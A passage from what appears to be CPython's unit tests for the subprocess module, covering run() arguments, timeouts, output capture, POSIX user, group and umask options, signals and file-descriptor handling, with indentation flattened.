self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
@unittest.skipIf(not sysconfig.get_config_var("HAVE_VFORK"),
"vfork() not enabled by configure.")
@mock.patch("subprocess._fork_exec")
def test__use_vfork(self, mock_fork_exec):
self.assertTrue(subprocess._USE_VFORK) # The default value regardless.
mock_fork_exec.side_effect = RuntimeError("just testing args")
with self.assertRaises(RuntimeError):
subprocess.run([sys.executable, "-c", "pass"])
mock_fork_exec.assert_called_once()
self.assertTrue(mock_fork_exec.call_args.args[-1])
with mock.patch.object(subprocess, '_USE_VFORK', False):
with self.assertRaises(RuntimeError):
subprocess.run([sys.executable, "-c", "pass"])
self.assertFalse(mock_fork_exec.call_args_list[-1].args[-1])
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def test_encoding_warning(self):
code = textwrap.dedent("""\
from subprocess import *
run("echo hello", shell=True, text=True)
check_output("echo hello", shell=True, text=True)
""")
cp = subprocess.run([sys.executable, "-Xwarn_default_encoding", "-c", code],
capture_output=True)
lines = cp.stderr.splitlines()
self.assertEqual(len(lines), 2, lines)
self.assertTrue(lines[0].startswith(b"<string>:2: EncodingWarning: "))
self.assertTrue(lines[1].startswith(b"<string>:3: EncodingWarning: "))
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except PermissionError as e:
if e.errno != errno.EPERM:
raise # EACCES?
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setpgid') and hasattr(os, 'getpgid'),
'no setpgid or getpgid on platform')
def test_process_group_0(self):
# For code coverage of calling setpgid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getpgid(0))"],
process_group=0)
except PermissionError as e:
if e.errno != errno.EPERM:
raise # EACCES?
else:
parent_pgid = os.getpgid(0)
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, user=2**64)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, group=2**64)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ,
extra_groups=[2**64])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so as a unique mode
# for us to test the child's touched file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._fork_exec,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
enabled = gc.isenabled()
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
finally:
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
